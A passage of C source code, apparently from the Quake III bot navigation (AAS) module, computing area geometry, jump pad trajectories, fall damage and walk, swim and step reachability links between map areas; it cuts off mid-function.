//===========================================================================
// returns the surface area of the given face
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
float AAS_FaceArea(aas_face_t *face)
{
int i, edgenum, side;
float total;
float *v;
vec3_t d1, d2, cross;
aas_edge_t *edge;
edgenum = aasworld.edgeindex[face->firstedge];
side = edgenum < 0;
edge = &aasworld.edges[abs(edgenum)];
v = aasworld.vertexes[edge->v[side]];
total = 0;
for (i = 1; i < face->numedges - 1; i++)
{
edgenum = aasworld.edgeindex[face->firstedge + i];
side = edgenum < 0;
edge = &aasworld.edges[abs(edgenum)];
VectorSubtract(aasworld.vertexes[edge->v[side]], v, d1);
VectorSubtract(aasworld.vertexes[edge->v[!side]], v, d2);
CrossProduct(d1, d2, cross);
total += 0.5 * VectorLength(cross);
} //end for
return total;
} //end of the function AAS_FaceArea
//===========================================================================
// returns the volume of an area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
float AAS_AreaVolume(int areanum)
{
int i, edgenum, facenum, side;
float d, a, volume;
vec3_t corner;
aas_plane_t *plane;
aas_edge_t *edge;
aas_face_t *face;
aas_area_t *area;
area = &aasworld.areas[areanum];
facenum = aasworld.faceindex[area->firstface];
face = &aasworld.faces[abs(facenum)];
edgenum = aasworld.edgeindex[face->firstedge];
edge = &aasworld.edges[abs(edgenum)];
//
VectorCopy(aasworld.vertexes[edge->v[0]], corner);
//make tetrahedrons to all other faces
volume = 0;
for (i = 0; i < area->numfaces; i++)
{
facenum = abs(aasworld.faceindex[area->firstface + i]);
face = &aasworld.faces[facenum];
side = face->backarea != areanum;
plane = &aasworld.planes[face->planenum ^ side];
d = -(DotProduct (corner, plane->normal) - plane->dist);
a = AAS_FaceArea(face);
volume += d * a;
} //end for
volume /= 3;
return volume;
} //end of the function AAS_AreaVolume
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_BestReachableLinkArea(aas_link_t *areas)
{
aas_link_t *link;
for (link = areas; link; link = link->next_area)
{
if (AAS_AreaGrounded(link->areanum) || AAS_AreaSwim(link->areanum))
{
return link->areanum;
} //end if
} //end for
//
for (link = areas; link; link = link->next_area)
{
if (link->areanum) return link->areanum;
//FIXME: this is a bad idea when the reachability is not yet
// calculated when the level items are loaded
if (AAS_AreaReachability(link->areanum))
return link->areanum;
} //end for
return 0;
} //end of the function AAS_BestReachableLinkArea
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_GetJumpPadInfo(int ent, vec3_t areastart, vec3_t absmins, vec3_t absmaxs, vec3_t velocity)
{
int modelnum, ent2;
float speed, height, gravity, time, dist, forward;
vec3_t origin, angles, teststart, ent2origin;
aas_trace_t trace;
char model[MAX_EPAIRKEY];
char target[MAX_EPAIRKEY], targetname[MAX_EPAIRKEY];
//
AAS_FloatForBSPEpairKey(ent, "speed", &speed);
if (!speed) speed = 1000;
VectorClear(angles);
//get the mins, maxs and origin of the model
AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY);
if (model[0]) modelnum = atoi(model+1);
else modelnum = 0;
AAS_BSPModelMinsMaxsOrigin(modelnum, angles, absmins, absmaxs, origin);
VectorAdd(origin, absmins, absmins);
VectorAdd(origin, absmaxs, absmaxs);
VectorAdd(absmins, absmaxs, origin);
VectorScale (origin, 0.5, origin);
//get the start areas
VectorCopy(origin, teststart);
teststart[2] += 64;
trace = AAS_TraceClientBBox(teststart, origin, PRESENCE_CROUCH, -1);
if (trace.startsolid)
{
botimport.Print(PRT_MESSAGE, "trigger_push start solid\n");
VectorCopy(origin, areastart);
} //end if
else
{
VectorCopy(trace.endpos, areastart);
} //end else
areastart[2] += 0.125;
//
//AAS_DrawPermanentCross(origin, 4, 4);
//get the target entity
AAS_ValueForBSPEpairKey(ent, "target", target, MAX_EPAIRKEY);
for (ent2 = AAS_NextBSPEntity(0); ent2; ent2 = AAS_NextBSPEntity(ent2))
{
if (!AAS_ValueForBSPEpairKey(ent2, "targetname", targetname, MAX_EPAIRKEY)) continue;
if (!strcmp(targetname, target)) break;
} //end for
if (!ent2)
{
botimport.Print(PRT_MESSAGE, "trigger_push without target entity %s\n", target);
return qfalse;
} //end if
AAS_VectorForBSPEpairKey(ent2, "origin", ent2origin);
//
height = ent2origin[2] - origin[2];
gravity = aassettings.phys_gravity;
time = sqrt( height / ( 0.5 * gravity ) );
if (!time)
{
botimport.Print(PRT_MESSAGE, "trigger_push without time\n");
return qfalse;
} //end if
// set s.origin2 to the push velocity
VectorSubtract ( ent2origin, origin, velocity);
dist = VectorNormalize( velocity);
forward = dist / time;
//FIXME: why multiply by 1.1
forward *= 1.1f;
VectorScale(velocity, forward, velocity);
velocity[2] = time * gravity;
return qtrue;
} //end of the function AAS_GetJumpPadInfo
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_BestReachableFromJumpPadArea(vec3_t origin, vec3_t mins, vec3_t maxs)
{
int ent, bot_visualizejumppads, bestareanum;
float volume, bestareavolume;
vec3_t areastart, cmdmove, bboxmins, bboxmaxs;
vec3_t absmins, absmaxs, velocity;
aas_clientmove_t move;
aas_link_t *areas, *link;
char classname[MAX_EPAIRKEY];
#ifdef BSPC
bot_visualizejumppads = 0;
#else
bot_visualizejumppads = LibVarValue("bot_visualizejumppads", "0");
#endif
VectorAdd(origin, mins, bboxmins);
VectorAdd(origin, maxs, bboxmaxs);
for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
{
if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
if (strcmp(classname, "trigger_push")) continue;
//
if (!AAS_GetJumpPadInfo(ent, areastart, absmins, absmaxs, velocity)) continue;
//get the areas the jump pad brush is in
areas = AAS_LinkEntityClientBBox(absmins, absmaxs, -1, PRESENCE_CROUCH);
for (link = areas; link; link = link->next_area)
{
if (AAS_AreaJumpPad(link->areanum)) break;
} //end for
if (!link)
{
botimport.Print(PRT_MESSAGE, "trigger_push not in any jump pad area\n");
AAS_UnlinkFromAreas(areas);
continue;
} //end if
//
//botimport.Print(PRT_MESSAGE, "found a trigger_push with velocity %f %f %f\n", velocity[0], velocity[1], velocity[2]);
//
VectorSet(cmdmove, 0, 0, 0);
Com_Memset(&move, 0, sizeof(aas_clientmove_t));
AAS_ClientMovementHitBBox(&move, -1, areastart, PRESENCE_NORMAL, qfalse,
velocity, cmdmove, 0, 30, 0.1f, bboxmins, bboxmaxs, bot_visualizejumppads);
if (move.frames < 30)
{
bestareanum = 0;
bestareavolume = 0;
for (link = areas; link; link = link->next_area)
{
if (!AAS_AreaJumpPad(link->areanum)) continue;
volume = AAS_AreaVolume(link->areanum);
if (volume >= bestareavolume)
{
bestareanum = link->areanum;
bestareavolume = volume;
} //end if
} //end if
AAS_UnlinkFromAreas(areas);
return bestareanum;
} //end if
AAS_UnlinkFromAreas(areas);
} //end for
return 0;
} //end of the function AAS_BestReachableFromJumpPadArea
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_BestReachableArea(vec3_t origin, vec3_t mins, vec3_t maxs, vec3_t goalorigin)
{
int areanum, i, j, k, l;
aas_link_t *areas;
vec3_t absmins, absmaxs;
//vec3_t bbmins, bbmaxs;
vec3_t start, end;
aas_trace_t trace;
if (!aasworld.loaded)
{
botimport.Print(PRT_ERROR, "AAS_BestReachableArea: aas not loaded\n");
return 0;
} //end if
//find a point in an area
VectorCopy(origin, start);
areanum = AAS_PointAreaNum(start);
//while no area found fudge around a little
for (i = 0; i < 5 && !areanum; i++)
{
for (j = 0; j < 5 && !areanum; j++)
{
for (k = -1; k <= 1 && !areanum; k++)
{
for (l = -1; l <= 1 && !areanum; l++)
{
VectorCopy(origin, start);
start[0] += (float) j * 4 * k;
start[1] += (float) j * 4 * l;
start[2] += (float) i * 4;
areanum = AAS_PointAreaNum(start);
} //end for
} //end for
} //end for
} //end for
//if an area was found
if (areanum)
{
//drop client bbox down and try again
VectorCopy(start, end);
start[2] += 0.25;
end[2] -= 50;
trace = AAS_TraceClientBBox(start, end, PRESENCE_CROUCH, -1);
if (!trace.startsolid)
{
areanum = AAS_PointAreaNum(trace.endpos);
VectorCopy(trace.endpos, goalorigin);
//FIXME: cannot enable next line right now because the reachability
// does not have to be calculated when the level items are loaded
//if the origin is in an area with reachability
//if (AAS_AreaReachability(areanum)) return areanum;
if (areanum) return areanum;
} //end if
else
{
//it can very well happen that the AAS_PointAreaNum function tells that
//a point is in an area and that starting an AAS_TraceClientBBox from that
//point will return trace.startsolid qtrue
#if 0
if (AAS_PointAreaNum(start))
{
Log_Write("point %f %f %f in area %d but trace startsolid", start[0], start[1], start[2], areanum);
AAS_DrawPermanentCross(start, 4, LINECOLOR_RED);
} //end if
botimport.Print(PRT_MESSAGE, "AAS_BestReachableArea: start solid\n");
#endif
VectorCopy(start, goalorigin);
return areanum;
} //end else
} //end if
//
//AAS_PresenceTypeBoundingBox(PRESENCE_CROUCH, bbmins, bbmaxs);
//NOTE: the goal origin does not have to be in the goal area
// because the bot will have to move towards the item origin anyway
VectorCopy(origin, goalorigin);
//
VectorAdd(origin, mins, absmins);
VectorAdd(origin, maxs, absmaxs);
//add bounding box size
//VectorSubtract(absmins, bbmaxs, absmins);
//VectorSubtract(absmaxs, bbmins, absmaxs);
//link an invalid (-1) entity
areas = AAS_LinkEntityClientBBox(absmins, absmaxs, -1, PRESENCE_CROUCH);
//get the reachable link arae
areanum = AAS_BestReachableLinkArea(areas);
//unlink the invalid entity
AAS_UnlinkFromAreas(areas);
//
return areanum;
} //end of the function AAS_BestReachableArea
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_SetupReachabilityHeap(void)
{
int i;
reachabilityheap = (aas_lreachability_t *) GetClearedMemory(
AAS_MAX_REACHABILITYSIZE * sizeof(aas_lreachability_t));
for (i = 0; i < AAS_MAX_REACHABILITYSIZE-1; i++)
{
reachabilityheap[i].next = &reachabilityheap[i+1];
} //end for
reachabilityheap[AAS_MAX_REACHABILITYSIZE-1].next = NULL;
nextreachability = reachabilityheap;
numlreachabilities = 0;
} //end of the function AAS_InitReachabilityHeap
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_ShutDownReachabilityHeap(void)
{
FreeMemory(reachabilityheap);
numlreachabilities = 0;
} //end of the function AAS_ShutDownReachabilityHeap
//===========================================================================
// returns a reachability link
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
aas_lreachability_t *AAS_AllocReachability(void)
{
aas_lreachability_t *r;
if (!nextreachability) return NULL;
//make sure the error message only shows up once
if (!nextreachability->next) AAS_Error("AAS_MAX_REACHABILITYSIZE\n");
//
r = nextreachability;
nextreachability = nextreachability->next;
numlreachabilities++;
return r;
} //end of the function AAS_AllocReachability
//===========================================================================
// frees a reachability link
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_FreeReachability(aas_lreachability_t *lreach)
{
Com_Memset(lreach, 0, sizeof(aas_lreachability_t));
lreach->next = nextreachability;
nextreachability = lreach;
numlreachabilities--;
} //end of the function AAS_FreeReachability
//===========================================================================
// returns qtrue if the area has reachability links
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaReachability(int areanum)
{
if (areanum < 0 || areanum >= aasworld.numareas)
{
AAS_Error("AAS_AreaReachability: areanum %d out of range\n", areanum);
return 0;
} //end if
return aasworld.areasettings[areanum].numreachableareas;
} //end of the function AAS_AreaReachability
//===========================================================================
// returns the surface area of all ground faces together of the area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
float AAS_AreaGroundFaceArea(int areanum)
{
int i;
float total;
aas_area_t *area;
aas_face_t *face;
total = 0;
area = &aasworld.areas[areanum];
for (i = 0; i < area->numfaces; i++)
{
face = &aasworld.faces[abs(aasworld.faceindex[area->firstface + i])];
if (!(face->faceflags & FACE_GROUND)) continue;
//
total += AAS_FaceArea(face);
} //end for
return total;
} //end of the function AAS_AreaGroundFaceArea
//===========================================================================
// returns the center of a face
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_FaceCenter(int facenum, vec3_t center)
{
int i;
float scale;
aas_face_t *face;
aas_edge_t *edge;
face = &aasworld.faces[facenum];
VectorClear(center);
for (i = 0; i < face->numedges; i++)
{
edge = &aasworld.edges[abs(aasworld.edgeindex[face->firstedge + i])];
VectorAdd(center, aasworld.vertexes[edge->v[0]], center);
VectorAdd(center, aasworld.vertexes[edge->v[1]], center);
} //end for
scale = 0.5 / face->numedges;
VectorScale(center, scale, center);
} //end of the function AAS_FaceCenter
//===========================================================================
// returns the maximum distance a player can fall before being damaged
// damage = deltavelocity*deltavelocity * 0.0001
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_FallDamageDistance(void)
{
float maxzvelocity, gravity, t;
maxzvelocity = sqrt((float)(30 * 10000));
gravity = aassettings.phys_gravity;
t = maxzvelocity / gravity;
return 0.5 * gravity * t * t;
} //end of the function AAS_FallDamageDistance
//===========================================================================
// distance = 0.5 * gravity * t * t
// vel = t * gravity
// damage = vel * vel * 0.0001
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
float AAS_FallDelta(float distance)
{
float t, delta, gravity;
gravity = aassettings.phys_gravity;
t = sqrt(fabs(distance) * 2 / gravity);
delta = t * gravity;
return delta * delta * 0.0001;
} //end of the function AAS_FallDelta
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
float AAS_MaxJumpHeight(float phys_jumpvel)
{
float phys_gravity;
phys_gravity = aassettings.phys_gravity;
//maximum height a player can jump with the given initial z velocity
return 0.5 * phys_gravity * (phys_jumpvel / phys_gravity) * (phys_jumpvel / phys_gravity);
} //end of the function MaxJumpHeight
//===========================================================================
// returns true if a player can only crouch in the area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
float AAS_MaxJumpDistance(float phys_jumpvel)
{
float phys_gravity, phys_maxvelocity, t;
phys_gravity = aassettings.phys_gravity;
phys_maxvelocity = aassettings.phys_maxvelocity;
//time a player takes to fall the height
t = sqrt(aassettings.rs_maxjumpfallheight / (0.5 * phys_gravity));
//maximum distance
return phys_maxvelocity * (t + phys_jumpvel / phys_gravity);
} //end of the function AAS_MaxJumpDistance
//===========================================================================
// returns true if a player can only crouch in the area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaCrouch(int areanum)
{
if (!(aasworld.areasettings[areanum].presencetype & PRESENCE_NORMAL)) return qtrue;
else return qfalse;
} //end of the function AAS_AreaCrouch
//===========================================================================
// returns qtrue if it is possible to swim in the area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaSwim(int areanum)
{
if (aasworld.areasettings[areanum].areaflags & AREA_LIQUID) return qtrue;
else return qfalse;
} //end of the function AAS_AreaSwim
//===========================================================================
// returns qtrue if the area contains a liquid
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaLiquid(int areanum)
{
if (aasworld.areasettings[areanum].areaflags & AREA_LIQUID) return qtrue;
else return qfalse;
} //end of the function AAS_AreaLiquid
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaLava(int areanum)
{
return (aasworld.areasettings[areanum].contents & AREACONTENTS_LAVA);
} //end of the function AAS_AreaLava
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaSlime(int areanum)
{
return (aasworld.areasettings[areanum].contents & AREACONTENTS_SLIME);
} //end of the function AAS_AreaSlime
//===========================================================================
// returns qtrue if the area contains ground faces
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaGrounded(int areanum)
{
return (aasworld.areasettings[areanum].areaflags & AREA_GROUNDED);
} //end of the function AAS_AreaGround
//===========================================================================
// returns true if the area contains ladder faces
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaLadder(int areanum)
{
return (aasworld.areasettings[areanum].areaflags & AREA_LADDER);
} //end of the function AAS_AreaLadder
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaJumpPad(int areanum)
{
return (aasworld.areasettings[areanum].contents & AREACONTENTS_JUMPPAD);
} //end of the function AAS_AreaJumpPad
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaTeleporter(int areanum)
{
return (aasworld.areasettings[areanum].contents & AREACONTENTS_TELEPORTER);
} //end of the function AAS_AreaTeleporter
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaClusterPortal(int areanum)
{
return (aasworld.areasettings[areanum].contents & AREACONTENTS_CLUSTERPORTAL);
} //end of the function AAS_AreaClusterPortal
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_AreaDoNotEnter(int areanum)
{
return (aasworld.areasettings[areanum].contents & AREACONTENTS_DONOTENTER);
} //end of the function AAS_AreaDoNotEnter
//===========================================================================
// returns the time it takes perform a barrier jump
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
unsigned short int AAS_BarrierJumpTravelTime(void)
{
return aassettings.phys_jumpvel / (aassettings.phys_gravity * 0.1);
} //end op the function AAS_BarrierJumpTravelTime
//===========================================================================
// returns true if there already exists a reachability from area1 to area2
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
qboolean AAS_ReachabilityExists(int area1num, int area2num)
{
aas_lreachability_t *r;
for (r = areareachability[area1num]; r; r = r->next)
{
if (r->areanum == area2num) return qtrue;
} //end for
return qfalse;
} //end of the function AAS_ReachabilityExists
//===========================================================================
// returns true if there is a solid just after the end point when going
// from start to end
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_NearbySolidOrGap(vec3_t start, vec3_t end)
{
vec3_t dir, testpoint;
int areanum;
VectorSubtract(end, start, dir);
dir[2] = 0;
VectorNormalize(dir);
VectorMA(end, 48, dir, testpoint);
areanum = AAS_PointAreaNum(testpoint);
if (!areanum)
{
testpoint[2] += 16;
areanum = AAS_PointAreaNum(testpoint);
if (!areanum) return qtrue;
} //end if
VectorMA(end, 64, dir, testpoint);
areanum = AAS_PointAreaNum(testpoint);
if (areanum)
{
if (!AAS_AreaSwim(areanum) && !AAS_AreaGrounded(areanum)) return qtrue;
} //end if
return qfalse;
} //end of the function AAS_SolidGapTime
//===========================================================================
// searches for swim reachabilities between adjacent areas
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_Swim(int area1num, int area2num)
{
int i, j, face1num, face2num, side1;
aas_area_t *area1, *area2;
aas_lreachability_t *lreach;
aas_face_t *face1;
aas_plane_t *plane;
vec3_t start;
if (!AAS_AreaSwim(area1num) || !AAS_AreaSwim(area2num)) return qfalse;
//if the second area is crouch only
if (!(aasworld.areasettings[area2num].presencetype & PRESENCE_NORMAL)) return qfalse;
area1 = &aasworld.areas[area1num];
area2 = &aasworld.areas[area2num];
//if the areas are not near anough
for (i = 0; i < 3; i++)
{
if (area1->mins[i] > area2->maxs[i] + 10) return qfalse;
if (area1->maxs[i] < area2->mins[i] - 10) return qfalse;
} //end for
//find a shared face and create a reachability link
for (i = 0; i < area1->numfaces; i++)
{
face1num = aasworld.faceindex[area1->firstface + i];
side1 = face1num < 0;
face1num = abs(face1num);
//
for (j = 0; j < area2->numfaces; j++)
{
face2num = abs(aasworld.faceindex[area2->firstface + j]);
//
if (face1num == face2num)
{
AAS_FaceCenter(face1num, start);
//
if (AAS_PointContents(start) & (CONTENTS_LAVA|CONTENTS_SLIME|CONTENTS_WATER))
{
//
face1 = &aasworld.faces[face1num];
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = face1num;
lreach->edgenum = 0;
VectorCopy(start, lreach->start);
plane = &aasworld.planes[face1->planenum ^ side1];
VectorMA(lreach->start, -INSIDEUNITS, plane->normal, lreach->end);
lreach->traveltype = TRAVEL_SWIM;
lreach->traveltime = 1;
//if the volume of the area is rather small
if (AAS_AreaVolume(area2num) < 800)
lreach->traveltime += 200;
//if (!(AAS_PointContents(start) & MASK_WATER)) lreach->traveltime += 500;
//link the reachability
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
reach_swim++;
return qtrue;
} //end if
} //end if
} //end for
} //end for
return qfalse;
} //end of the function AAS_Reachability_Swim
//===========================================================================
// searches for reachabilities between adjacent areas with equal floor
// heights
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_EqualFloorHeight(int area1num, int area2num)
{
int i, j, edgenum, edgenum1, edgenum2, foundreach, side;
float height, bestheight, length, bestlength;
vec3_t dir, start, end, normal, invgravity, gravitydirection = {0, 0, -1};
vec3_t edgevec;
aas_area_t *area1, *area2;
aas_face_t *face1, *face2;
aas_edge_t *edge;
aas_plane_t *plane2;
aas_lreachability_t lr, *lreach;
if (!AAS_AreaGrounded(area1num) || !AAS_AreaGrounded(area2num)) return qfalse;
area1 = &aasworld.areas[area1num];
area2 = &aasworld.areas[area2num];
//if the areas are not near anough in the x-y direction
for (i = 0; i < 2; i++)
{
if (area1->mins[i] > area2->maxs[i] + 10) return qfalse;
if (area1->maxs[i] < area2->mins[i] - 10) return qfalse;
} //end for
//if area 2 is too high above area 1
if (area2->mins[2] > area1->maxs[2]) return qfalse;
//
VectorCopy(gravitydirection, invgravity);
VectorInverse(invgravity);
//
bestheight = 99999;
bestlength = 0;
foundreach = qfalse;
Com_Memset(&lr, 0, sizeof(aas_lreachability_t)); //make the compiler happy
//
//check if the areas have ground faces with a common edge
//if existing use the lowest common edge for a reachability link
for (i = 0; i < area1->numfaces; i++)
{
face1 = &aasworld.faces[abs(aasworld.faceindex[area1->firstface + i])];
if (!(face1->faceflags & FACE_GROUND)) continue;
//
for (j = 0; j < area2->numfaces; j++)
{
face2 = &aasworld.faces[abs(aasworld.faceindex[area2->firstface + j])];
if (!(face2->faceflags & FACE_GROUND)) continue;
//if there is a common edge
for (edgenum1 = 0; edgenum1 < face1->numedges; edgenum1++)
{
for (edgenum2 = 0; edgenum2 < face2->numedges; edgenum2++)
{
if (abs(aasworld.edgeindex[face1->firstedge + edgenum1]) !=
abs(aasworld.edgeindex[face2->firstedge + edgenum2]))
continue;
edgenum = aasworld.edgeindex[face1->firstedge + edgenum1];
side = edgenum < 0;
edge = &aasworld.edges[abs(edgenum)];
//get the length of the edge
VectorSubtract(aasworld.vertexes[edge->v[1]],
aasworld.vertexes[edge->v[0]], dir);
length = VectorLength(dir);
//get the start point
VectorAdd(aasworld.vertexes[edge->v[0]],
aasworld.vertexes[edge->v[1]], start);
VectorScale(start, 0.5, start);
VectorCopy(start, end);
//get the end point several units inside area2
//and the start point several units inside area1
//NOTE: normal is pointing into area2 because the
//face edges are stored counter clockwise
VectorSubtract(aasworld.vertexes[edge->v[side]],
aasworld.vertexes[edge->v[!side]], edgevec);
plane2 = &aasworld.planes[face2->planenum];
CrossProduct(edgevec, plane2->normal, normal);
VectorNormalize(normal);
//
//VectorMA(start, -1, normal, start);
VectorMA(end, INSIDEUNITS_WALKEND, normal, end);
VectorMA(start, INSIDEUNITS_WALKSTART, normal, start);
end[2] += 0.125;
//
height = DotProduct(invgravity, start);
//NOTE: if there's nearby solid or a gap area after this area
//disabled this crap
//if (AAS_NearbySolidOrGap(start, end)) height += 200;
//NOTE: disabled because it disables reachabilities to very small areas
//if (AAS_PointAreaNum(end) != area2num) continue;
//get the longest lowest edge
if (height < bestheight ||
(height < bestheight + 1 && length > bestlength))
{
bestheight = height;
bestlength = length;
//create a new reachability link
lr.areanum = area2num;
lr.facenum = 0;
lr.edgenum = edgenum;
VectorCopy(start, lr.start);
VectorCopy(end, lr.end);
lr.traveltype = TRAVEL_WALK;
lr.traveltime = 1;
foundreach = qtrue;
} //end if
} //end for
} //end for
} //end for
} //end for
if (foundreach)
{
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = lr.areanum;
lreach->facenum = lr.facenum;
lreach->edgenum = lr.edgenum;
VectorCopy(lr.start, lreach->start);
VectorCopy(lr.end, lreach->end);
lreach->traveltype = lr.traveltype;
lreach->traveltime = lr.traveltime;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//if going into a crouch area
if (!AAS_AreaCrouch(area1num) && AAS_AreaCrouch(area2num))
{
lreach->traveltime += aassettings.rs_startcrouch;
} //end if
/*
//NOTE: if there's nearby solid or a gap area after this area
if (!AAS_NearbySolidOrGap(lreach->start, lreach->end))
{
lreach->traveltime += 100;
} //end if
*/
//avoid rather small areas
//if (AAS_AreaGroundFaceArea(lreach->areanum) < 500) lreach->traveltime += 100;
//
reach_equalfloor++;
return qtrue;
} //end if
return qfalse;
} //end of the function AAS_Reachability_EqualFloorHeight
//===========================================================================
// searches step, barrier, waterjump and walk off ledge reachabilities
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_Step_Barrier_WaterJump_WalkOffLedge(int area1num, int area2num)
{
int i, j, k, l, edge1num, edge2num, areas[10], numareas;
int ground_bestarea2groundedgenum, ground_foundreach;
int water_bestarea2groundedgenum, water_foundreach;
int side1, area1swim, faceside1, groundface1num;
float dist, dist1, dist2, diff, ortdot;
//float invgravitydot;
float x1, x2, x3, x4, y1, y2, y3, y4, tmp, y;
float length, ground_bestlength, water_bestlength, ground_bestdist, water_bestdist;
vec3_t v1, v2, v3, v4, tmpv, p1area1, p1area2, p2area1, p2area2;
vec3_t normal, ort, edgevec, start, end, dir;
vec3_t ground_beststart = {0, 0, 0}, ground_bestend = {0, 0, 0}, ground_bestnormal = {0, 0, 0};
vec3_t water_beststart = {0, 0, 0}, water_bestend = {0, 0, 0}, water_bestnormal = {0, 0, 0};
vec3_t invgravity = {0, 0, 1};
vec3_t testpoint;
aas_plane_t *plane;
aas_area_t *area1, *area2;
aas_face_t *groundface1, *groundface2;
aas_edge_t *edge1, *edge2;
aas_lreachability_t *lreach;
aas_trace_t trace;
//must be able to walk or swim in the first area
if (!AAS_AreaGrounded(area1num) && !AAS_AreaSwim(area1num)) return qfalse;
//
if (!AAS_AreaGrounded(area2num) && !AAS_AreaSwim(area2num)) return qfalse;
//
area1 = &aasworld.areas[area1num];
area2 = &aasworld.areas[area2num];
//if the first area contains a liquid
area1swim = AAS_AreaSwim(area1num);
//if the areas are not near enough in the x-y direction
for (i = 0; i < 2; i++)
{
if (area1->mins[i] > area2->maxs[i] + 10) return qfalse;
if (area1->maxs[i] < area2->mins[i] - 10) return qfalse;
} //end for
//
ground_foundreach = qfalse;
ground_bestdist = 99999;
ground_bestlength = 0;
ground_bestarea2groundedgenum = 0;
//
water_foundreach = qfalse;
water_bestdist = 99999;
water_bestlength = 0;
water_bestarea2groundedgenum = 0;
//
for (i = 0; i < area1->numfaces; i++)
{
groundface1num = aasworld.faceindex[area1->firstface + i];
faceside1 = groundface1num < 0;
groundface1 = &aasworld.faces[abs(groundface1num)];
//if this isn't a ground face
if (!(groundface1->faceflags & FACE_GROUND))
{
//if we can swim in the first area
if (area1swim)
{
//face plane must be more or less horizontal
plane = &aasworld.planes[groundface1->planenum ^ (!faceside1)];
if (DotProduct(plane->normal, invgravity) < 0.7) continue;
} //end if
else
{
//if we can't swim in the area it must be a ground face
continue;
} //end else
} //end if
//
for (k = 0; k < groundface1->numedges; k++)
{
edge1num = aasworld.edgeindex[groundface1->firstedge + k];
side1 = (edge1num < 0);
//NOTE: for water faces we must take the side area 1 is
// on into account because the face is shared and doesn't
// have to be oriented correctly
if (!(groundface1->faceflags & FACE_GROUND)) side1 = (side1 == faceside1);
edge1num = abs(edge1num);
edge1 = &aasworld.edges[edge1num];
//vertexes of the edge
VectorCopy(aasworld.vertexes[edge1->v[!side1]], v1);
VectorCopy(aasworld.vertexes[edge1->v[side1]], v2);
//get a vertical plane through the edge
//NOTE: normal is pointing into area 2 because the
//face edges are stored counter clockwise
VectorSubtract(v2, v1, edgevec);
CrossProduct(edgevec, invgravity, normal);
VectorNormalize(normal);
dist = DotProduct(normal, v1);
//check the faces from the second area
for (j = 0; j < area2->numfaces; j++)
{
groundface2 = &aasworld.faces[abs(aasworld.faceindex[area2->firstface + j])];
//must be a ground face
if (!(groundface2->faceflags & FACE_GROUND)) continue;
//check the edges of this ground face
for (l = 0; l < groundface2->numedges; l++)
{
edge2num = abs(aasworld.edgeindex[groundface2->firstedge + l]);
edge2 = &aasworld.edges[edge2num];
//vertexes of the edge
VectorCopy(aasworld.vertexes[edge2->v[0]], v3);
VectorCopy(aasworld.vertexes[edge2->v[1]], v4);
//check the distance between the two points and the vertical plane
//through the edge of area1
diff = DotProduct(normal, v3) - dist;
if (diff < -0.1 || diff > 0.1) continue;
diff = DotProduct(normal, v4) - dist;
if (diff < -0.1 || diff > 0.1) continue;
//
//project the two ground edges into the step side plane
//and calculate the shortest distance between the two
//edges if they overlap in the direction orthogonal to
//the gravity direction
CrossProduct(invgravity, normal, ort);
//invgravitydot = DotProduct(invgravity, invgravity);
ortdot = DotProduct(ort, ort);
//projection into the step plane
//NOTE: since gravity is vertical this is just the z coordinate
y1 = v1[2];//DotProduct(v1, invgravity) / invgravitydot;
y2 = v2[2];//DotProduct(v2, invgravity) / invgravitydot;
y3 = v3[2];//DotProduct(v3, invgravity) / invgravitydot;
y4 = v4[2];//DotProduct(v4, invgravity) / invgravitydot;
//
